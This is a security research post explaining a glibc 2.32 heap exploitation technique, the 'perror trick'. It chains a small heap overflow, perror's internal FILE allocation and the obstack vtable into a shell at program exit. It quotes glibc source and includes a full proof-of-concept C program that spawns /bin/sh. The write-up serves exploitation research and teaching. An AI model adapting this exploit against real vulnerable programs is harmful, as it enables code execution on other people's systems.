Perror Trick



This post describes a novel heap exploitation technique for gaining arbitrary code execution via a 2-byte heap overflow, a perror call, and a controlled exit. This technique as presented is known to work with glibc 2.32.

The novelty of this technique lies in using perror and its interaction with malloc to add an attacker crafted FILE object to glibc’s global linked list of open FILE streams.

Arbitrary code execution is obtained by preparing this crafted FILE to invoke a shell using the obstack vtable bypass.

Prerequisites

This attack requires the ability to trigger a perror invocation followed by an _IO_cleanup call (for example via exit) and makes use of a small heap buffer overflow to corrupt the size of a chunk in the unsorted bin.

Additionally moderate control over heap allocations is required to coerce the heap into a state suitable for launching the attack.

Background

perror is a utility function that is commonly used in error handling in C programs. It takes a single string argument and outputs the string along with a human readable description of the current errno value to the stderr file descriptor.

The interesting aspect of this behavior for the purposes of this article is that when perror executes it attempts to allocate its own FILE structure using the same underlying file descriptor used by stderr. After writing the error message perror closes this temporary FILE stream.

46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
void
perror (const char *s)
{
  int errnum = errno;
  FILE *fp;
  int fd = -1;


  /* The standard says that 'perror' must not change the orientation
     of the stream.  What is supposed to happen when the stream isn't
     oriented yet?  In this case we'll create a new stream which is
     using the same underlying file descriptor.  */
  if (__builtin_expect (_IO_fwide (stderr, 0) != 0, 1)
      || (fd = __fileno (stderr)) == -1
      || (fd = __dup (fd)) == -1
      || (fp = fdopen (fd, "w+")) == NULL)
    {
      if (__glibc_unlikely (fd != -1))
        __close (fd);

      /* Use standard error as is.  */
      perror_internal (stderr, s, errnum);
    }
  else
    {
      /* We don't have to do any special hacks regarding the file
         position.  Since the stderr stream wasn't used so far we just
         write to the descriptor.  */
      perror_internal (fp, s, errnum);

      if (_IO_ferror_unlocked (fp))
        stderr->_flags |= _IO_ERR_SEEN;

      /* Close the stream.  */
      fclose (fp);
    }
}

Creating a new FILE via fdopen results in the immediate malloc allocation for the FILE structure.

189
190
extern FILE *_IO_new_fdopen (int, const char*);
#   define fdopen(fd, mode) _IO_new_fdopen (fd, mode)
33
34
35
36
37
38
39
40
41
42
43
44
45
46
FILE *
_IO_new_fdopen (int fd, const char *mode)
{
  int read_write;
  struct locked_FILE
  {
    struct _IO_FILE_plus fp;
#ifdef _IO_MTSAFE_IO
    _IO_lock_t lock;
#endif
    struct _IO_wide_data wd;
  } *new_f;
  int i;
  int use_mmap = 0;
• • •
122
123
124
  new_f = (struct locked_FILE *) malloc (sizeof (struct locked_FILE));
  if (new_f == NULL)
    return NULL;
• • •
161
162
  return &new_f->fp.file;
}

A second allocation occurs when perror attempts to write to its newly allocated FILE.

When a FILE is first allocated, its internal write and read buffers are null-initialized. The buffers are lazily initialized in the process of buffering output.

The actual allocation is performed by the _IO_file_doallocate method. The size of the allocation is inferred from the block size of the underlying the device with a default block size as a fall back.

99
#define BUFSIZ 8192
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
int
_IO_file_doallocate (FILE *fp)
{
  size_t size;
  char *p;
  struct stat64 st;

  size = BUFSIZ;
  if (fp->_fileno >= 0 && __builtin_expect (_IO_SYSSTAT (fp, &st), 0) >= 0)
    {
      if (S_ISCHR (st.st_mode))
        {
          /* Possibly a tty.  */
          if (
#ifdef DEV_TTY_P
              DEV_TTY_P (&st) ||
#endif
              local_isatty (fp->_fileno))
            fp->_flags |= _IO_LINE_BUF;
        }
#if defined _STATBUF_ST_BLKSIZE
      if (st.st_blksize > 0 && st.st_blksize < BUFSIZ)
        size = st.st_blksize;
#endif
    }
  p = malloc (size);
  if (__glibc_unlikely (p == NULL))
    return EOF;
  _IO_setb (fp, p, p + size, 1);
  return 1;
}

After writing the error message perror closes the temporary FILE. The interesting behavior here is that the FILE that is being closed is “unlinked”.

193
194
extern int _IO_new_fclose (FILE*);
#   define fclose(fp) _IO_new_fclose (fp)
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
int
_IO_new_fclose (FILE *fp)
{
  int status;

  CHECK_FILE(fp, EOF);

#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_1)
  /* We desperately try to help programs which are using streams in a
     strange way and mix old and new functions.  Detect old streams
     here.  */
  if (_IO_vtable_offset (fp) != 0)
    return _IO_old_fclose (fp);
#endif

  /* First unlink the stream.  */
  if (fp->_flags & _IO_IS_FILEBUF)
    _IO_un_link ((struct _IO_FILE_plus *) fp);

All of the FILE objects opened by glibc are added to a global _IO_list_all linked list. The _IO_list_all global points to the most recently open file with the FILE._chain field pointing to the next FILE in the list.

Unlinking a FILE removes it from this global linked list. This process involves copying the _chain pointer from the closing FILE to the previous FILE in the list.

In the perror case, this will typically directly write to _IO_list_all since the temporary file was just created as part of the perror call and is likely at the front of the list.

51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
void
_IO_un_link (struct _IO_FILE_plus *fp)
{
  if (fp->file._flags & _IO_LINKED)
    {
      FILE **f;
#ifdef _IO_MTSAFE_IO
      _IO_cleanup_region_start_noarg (flush_cleanup);
      _IO_lock_lock (list_all_lock);
      run_fp = (FILE *) fp;
      _IO_flockfile ((FILE *) fp);
#endif
      if (_IO_list_all == NULL)
        ;
      else if (fp == _IO_list_all)
        _IO_list_all = (struct _IO_FILE_plus *) _IO_list_all->file._chain;
      else
        for (f = &_IO_list_all->file._chain; *f; f = &(*f)->_chain)
          if (*f == (FILE *) fp)
            {
              *f = fp->file._chain;
              break;
            }
      fp->file._flags &= ~_IO_LINKED;
#ifdef _IO_MTSAFE_IO
      _IO_funlockfile ((FILE *) fp);
      run_fp = NULL;
      _IO_lock_unlock (list_all_lock);
      _IO_cleanup_region_end (0);
#endif
    }
}

This _IO_list_all list is used by _IO_cleanup at program termination to flush all open files.

1119
text_set_element(__libc_atexit, _IO_cleanup);
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
int
_IO_cleanup (void)
{
  /* We do *not* want locking.  Some threads might use streams but
     that is their problem, we flush them underneath them.  */
  int result = _IO_flush_all_lockp (0);

  /* We currently don't have a reliable mechanism for making sure that
     C++ static destructors are executed in the correct order.
     So it is possible that other static destructors might want to
     write to cout - and they're supposed to be able to do so.

     The following will make the standard streambufs be unbuffered,
     which forces any output from late destructors to be written out. */
  _IO_unbuffer_all ();

  return result;
}

Flushing the open files involves iterating over _IO_list_all and potentially invoking the overflow vtable entry via _IO_OVERFLOW if there is pending data in the file’s write buffer.

684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
int
_IO_flush_all_lockp (int do_lock)
{
  int result = 0;
  FILE *fp;

#ifdef _IO_MTSAFE_IO
  _IO_cleanup_region_start_noarg (flush_cleanup);
  _IO_lock_lock (list_all_lock);
#endif

  for (fp = (FILE *) _IO_list_all; fp != NULL; fp = fp->_chain)
    {
      run_fp = fp;
      if (do_lock)
	_IO_flockfile (fp);

      if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
	   || (_IO_vtable_offset (fp) == 0
	       && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
				    > fp->_wide_data->_IO_write_base))
	   )
	  && _IO_OVERFLOW (fp, EOF) == EOF)
	result = EOF;

      if (do_lock)
	_IO_funlockfile (fp);
      run_fp = NULL;
    }

#ifdef _IO_MTSAFE_IO
  _IO_lock_unlock (list_all_lock);
  _IO_cleanup_region_end (0);
#endif

  return result;
}

In summary, calling perror performs the following interesting actions:

  1. A new temporary FILE is opened for writing, the memory for this object is allocated from malloc.
  2. A second large chunk is allocated from malloc for buffering output.
  3. The temporary FILE is closed, freeing the allocated buffers, and unlinking the file from _IO_list_all.

Later, normal program termination will result in glibc flushing all files in _IO_list_all which may invoke the overflow vtable entry.

Attack

The strategy for leveraging this behavior into code execution is to utilize the malloc operations performed by perror to corrupt the chain pointer of the temporary FILE and rely on the closing of that file to place the corrupted chain pointer value into _IO_list_all.

This can be done with the following steps:

  1. Build a fake FILE on the heap composed of two neighboring chunks one sized 0x20 and the other large enough to hold the remainder of the FILE.
  2. Perform an overlapping bin attack on an unsorted chunk so that it:
    • Matches the size exactly of the initial perror allocation for the FILE object.
    • Overlaps with a small bin chunk positioned such that the small bin chunk’s back pointer coincides with the chain pointer of the FILE object allocated by perror.
  3. Free the 0x20 chunk from step 1. to the fast bin.
  4. Trigger a perror call.

This will cause perror to use the altered unsorted chunk for its FILE. The second allocation for the write buffer will then sort the fast bin chunk into the small bin thus updating the small chunk’s back pointer to point to the fake FILE.

When perror closes its temporary FILE the global _IO_list_all will be updated to point to the fake FILE.

Building A Fake FILE

A fake FILE that executes a shell can be created using the obstack vtable bypass and is relatively straightforward. Differences from the approach described in the linked post are highlighed below.

The FILE is created from two separate but neighboring chunks. The first chunk must be small enough that it is placed in a fast bin when freed while the second chunk must be large enough to contain the remainder of the FILE object (at least 0xd0 for 64-bit glibc).

uintptr_t *fake_file_start = (uintptr_t *) malloc(0x10);
uintptr_t *fake_file_body = (uintptr_t *) malloc(0xd0);

This results in the following chunks being created in memory. Sizes are given in total chunk size which includes malloc meta-data overhead.

0x20
0xd0
fake FILE
in use
unsorted
fast
small

The vtable for the file is set to the _IO_obstack_jumps offset by 4 entries.

fake_file_body[21] = _IO_obstack_jumps + 0x20;

This is done so that the _IO_obstack_xsputn method is in the place of the overflow entry in the jump table.

 94
 95
 96
 97
 98
 99
100
101
102
const struct _IO_jump_t _IO_obstack_jumps libio_vtable attribute_hidden =
{
  JUMP_INIT_DUMMY,
  JUMP_INIT(finish, NULL),
  JUMP_INIT(overflow, _IO_obstack_overflow),
  JUMP_INIT(underflow, NULL),
  JUMP_INIT(uflow, NULL),
  JUMP_INIT(pbackfail, NULL),
  JUMP_INIT(xsputn, _IO_obstack_xsputn),

This attack relies on _IO_cleanup which eventually invokes the vtable’s overflow method. While both _IO_obstack_overflow and _IO_obstack_xsputn attempt to grow the associated obstack, _IO_obstack_overflow contains an assert that is triggered when invoked by _IO_cleanup which makes it unsuitable for use in this attack.

39
40
41
42
43
44
45
46
47
static int
_IO_obstack_overflow (FILE *fp, int c)
{
  struct obstack *obstack = ((struct _IO_obstack_file *) fp)->obstack;
  int size;

  /* Make room for another character.  This might as well allocate a
     new chunk a memory and moves the old contents over.  */
  assert (c != EOF);

Preparing the Heap

After a fake FILE is built the next step is to prepare the heap for the overlapping bin attack.

The goal of this step to end up with a memory arrangement like the one below where the attacker controls a chunk that can be overflown, followed by a unsorted victim, some padding, a small bin chunk, and some more padding.

0x230
Overflow
Victim
Padding #1
Chain
Padding #2
0x60
in use
unsorted
fast
small

The combined size of the victim chunk and first padding need to be 0x60 bytes to properly align the back pointer of the small bin chunk with the chain pointer of the eventual perror FILE.

Additionally, the second padding chunk needs to be under attacker control and large enough such that it contains the new previous size field after the victim chunk’s size is altered in the overlapping bin attack.

One method of achieving this layout is to prepare a large free chunk bordered by an allocated fence, and then repeatedly allocate smaller chunks from the free chunk:

// Step 1.
uintptr_t *hole = (uintptr_t *) malloc(0x500);
uintptr_t *fence = (uintptr_t *) malloc(0x500);
free(hole);

// Step 2.
uintptr_t *overflow_hole = (uintptr_t *) malloc(0x4b0);
uintptr_t *padding = (uintptr_t *) malloc(0x20);
free(overflow_hole);

// Step 3.
uintptr_t *overflow = (uintptr_t *) malloc(0x480);
0x510
0x510
Hole
Fence
0x4c0
0x30
0x20
Overflow Hole
Padding
Chain
Fence
0x490
0x30
Overflow
Victim
Padding
Chain
Fence
0x230
in use
unsorted
fast
small

Overlapping Bin Attack

Next a vulnerability is exploited whereby a heap overflow occurs allowing the attacker to alter the size of the victim chunk in the unsorted bin.

The size of the chunk is altered to match the exact size requested by perror for the FILE allocation. On 64-bit glibc 2.27 through 2.32 this size is 0x230. The low bit is set to 1 to indicate that the previous chunk is in use.

overflow[(0x480 / sizeof(uintptr_t)) + 1] = 0x231;
Overflow
Victim
Padding
Chain
Fence
Overflow
Victim
Padding
Chain
Fence
0x230
in use
unsorted
fast
small

When performing this attack on glibc 2.29 and later there are validations on unsorted chunks that must be satisfied in order to make malloc accept the corrupted chunk.

The following checks were introduced in glibc 2.29. The highlighted lines mark the ones that require additional work to satisfy.

3756
3757
3758
3759
3760
3761
3762
3763
3764
3765
3766
3767
3768
3769
3770
3771
3772
3773
3774
      while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
        {
          bck = victim->bk;
          size = chunksize (victim);
          mchunkptr next = chunk_at_offset (victim, size);

          if (__glibc_unlikely (size <= 2 * SIZE_SZ)
              || __glibc_unlikely (size > av->system_mem))
            malloc_printerr ("malloc(): invalid size (unsorted)");
          if (__glibc_unlikely (chunksize_nomask (next) < 2 * SIZE_SZ)
              || __glibc_unlikely (chunksize_nomask (next) > av->system_mem))
            malloc_printerr ("malloc(): invalid next size (unsorted)");
          if (__glibc_unlikely ((prev_size (next) & ~(SIZE_BITS)) != size))
            malloc_printerr ("malloc(): mismatching next->prev_size (unsorted)");
          if (__glibc_unlikely (bck->fd != victim)
              || __glibc_unlikely (victim->fd != unsorted_chunks (av)))
            malloc_printerr ("malloc(): unsorted double linked list corrupted");
          if (__glibc_unlikely (prev_inuse (next)))
            malloc_printerr ("malloc(): invalid next->prev_inuse (unsorted)");

This can be done by arranging for the end of the new unsorted bin chunk to land in an attacker controlled chunk that contains fake chunk meta-data.

fence[0x1a0 / sizeof(uintptr_t)] = 0x230;    /* prev_size */
fence[0x1a0 / sizeof(uintptr_t) + 1] = 0x20; /* size | prev not inuse */
fence[0x1a0 / sizeof(uintptr_t) + 5] = 0x21; /* size | prev in use */

Perror Trigger

After performing the overlapping chunk attack the final steps are to free the 0x20 chunk that contains the start of the fake FILE to the fast bin and trigger a perror invocation.

The initial call to perror is for an 0x230 sized chunk. Since this is a small bin sized request, malloc will attempt to service it from the unsorted bin after checking the small bin. In this case the previously prepared chunk will be an exact match and malloc will return it directly.

When peror writes the error message to its temporary FILE, it will allocate a large buffer for writing. Since this is a large buffer malloc will evict all fast bin chunks prior to searching the unsorted bin.

This will cause the chunk containing the fake FILE to be sorted into the same small bin as the chunk that overlaps with the perror FILE. This will corrupt the chain pointer of the perror FILE with the address of the fake FILE.

FILE Start
FILE Body
• • •
Overflow
Victim
Padding
Chain
Fence
FILE Start
FILE Body
• • •
Overflow
perror FILE
Padding
Chain
Fence
FILE Start
FILE Body
• • •
Overflow
perror FILE
Padding
Chain
Fence
in use
unsorted
fast
small

Finally, the perror call will close its temporary FILE which will place the fake FILE in the _IO_list_all global.

All that is left at this point to trigger code execution is to cause the program to exit cleanly. For example by returning from main or an exit call.

Example

// An example of performing the perror trick to leverage a small heap overflow
// into code execution. This demonstration relies on a heap and libc leak.
//
// Run with:
//   $ gcc -o example example.c && ./example

#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void fill_tcache(size_t size) {
  void* chunks[7] = {};
  for (int i = 0; i < 7; i++) {
    chunks[i] = malloc(size);
  }
  for (int i = 0; i < 7; i++) {
    free(chunks[i]);
  }
}

int main(int argc, char **argv) {
  // Place a shell command in a known region of memory.
  char *shell_command = (char *) malloc(0x10);
  strcpy(shell_command, "/bin/sh");

  // Construct a fake obstack struct where the chunkfun allocator function
  // points to system and the extra_arg field points to the location of the
  // shell command to execute.
  uintptr_t *fake_obstack = (uintptr_t *) malloc(0x100);
  fake_obstack[3] = 1;                         /* next_free */
  fake_obstack[4] = 0;                         /* chunk_limit */
  fake_obstack[7] = (uintptr_t) &system;       /* chunkfun */
  fake_obstack[9] = (uintptr_t) shell_command; /* extra_arg */
  fake_obstack[10] = -1;                       /* use_extra_arg */

  // Prepare the fake FILE.
  //
  // There are two chunks that are used in constructing the fake FILE. The first
  // is a small 0x20 chunk the second is a larger chunk that contains the bulk
  // of the FILE.
  uintptr_t *fake_file_start = (uintptr_t *) malloc(0);
  uintptr_t *fake_file = (uintptr_t *) malloc(0x500);

  // Construct a fake FILE object with a vtable pointing to the
  // _IO_obstack_jumps vtable and the obstack field pointing to the fake obstack
  // above.
  //
  // Setup the fake FILE to pass validation required to call _IO_OVERFLOW which
  // is invoked by _IO_cleanup. This requires a valid lock pointer pointing to
  // null, a small value for the write_end field, and an obstack refrence.
  fake_file[1] = 0;                            /* write_end */
  fake_file[11] = (uintptr_t) (fake_file + 8); /* lock */
  fake_file[22] = (uintptr_t) fake_obstack;    /* obstack */

  // Setup the vtable to trigger _IO_obstack_xsputn when the overflow vtable
  // method is invoked.
  uintptr_t _IO_file_jumps = ((uintptr_t *) stdin)[27];
  uintptr_t _IO_obstack_jumps = _IO_file_jumps - 0x240;
  fake_file[21] = _IO_obstack_jumps + 0x20;

  // Fill the 0x20 tcache. This will allow the fake_file_start to be freed to
  // the fast bin later.
  fill_tcache(0);

  // Create a large hole that will house:
  //
  //   - A large chunk that will be split to create an unsorted chunk for
  //     overflowing.
  //   - A 0x20 small bin chunk that will be used to corrupt perror's FILE's
  //     chain pointer.
  uintptr_t *hole = (uintptr_t *) malloc(0x500);
  uintptr_t *fence = (uintptr_t *) malloc(0x500);
  free(hole);

  // Split the hole into three allocations:
  //
  //  - Another hole that will be used to create the unsorted chunk for
  //    overflowing.
  //  - An 0x30 sized chunk that prevents consolidation and acts as padding to
  //    align the next chunk with the FILE object's chain pointer.
  //  - An 0x20 remainder chunk from the 0x30 allocation that will be placed
  //    into the unsorted bin now and eventually sorted into the small bin.
  void *overflow_hole = malloc(0x500 - 0x30 - 0x20);
  malloc(0x20);
  free(overflow_hole);

  // Allocate a victim chunk that will be the subject of an overflow
  // vulnerability. This will sort the 0x20 chunk created above into the small
  // bin and it will split the overflow hole created above into a remainder
  // chunk that is placed on the unsorted bin.
  //
  // The overflow hole and the victim chunk's size are arranged such that the
  // remainder chunk when interpreted as a FILE structure has a chain pointer
  // field that aligns with the back pointer of the 0x20 small bin chunk.
  uintptr_t *overflow = (uintptr_t *) malloc(0x480);

  // A VULNERABILITY is simulated here: the overflow chunk overflows into the
  // size of the neighboring chunk in the unsorted bin.
  //
  // The size is changed to 0x230 which exactly matches the size of the initial
  // perror allocation. The previous in use bit is set to maintain consistency
  // with overflow's in use status.
  overflow[(0x480 / sizeof(uintptr_t)) + 1] = 0x231;

  // The unsorted chunk that just had its sized altered will now overlap with
  // the fence chunk. Create some fake chunks within the fence chunk in order to
  // satisfy malloc's validations on unsorted chunks.
  fence[0x1a0 / sizeof(uintptr_t)] = 0x230;    /* prev_size */
  fence[0x1a0 / sizeof(uintptr_t) + 1] = 0x20; /* size | prev not inuse */
  fence[0x1a0 / sizeof(uintptr_t) + 5] = 0x21; /* size | prev in use */

  // Free the chunk corresponding to the fake FILE to the fast bin. The initial
  // malloc performed by perror will not touch this chunk since there is an
  // exact match already in the unsorted bin.
  //
  // However, the second allocation is a large allocation which will kill the
  // fast bins before sorting the unsorted bin. As a result this chunk will be
  // added to the 0x20 small bin which will update the back pointer of the small
  // bin chunk (and the FILE chunk's chain pointer).
  free(fake_file_start);

  // A call to perror will allocate a FILE, write to it, and close it. This will
  // write our fake FILE to _IO_list_all. Normal program termination, either by
  // returning from main or calling exit will result in _IO_cleanup being called
  // which will trigger the fake FILE.
  perror("hello world");
}
© Will Coster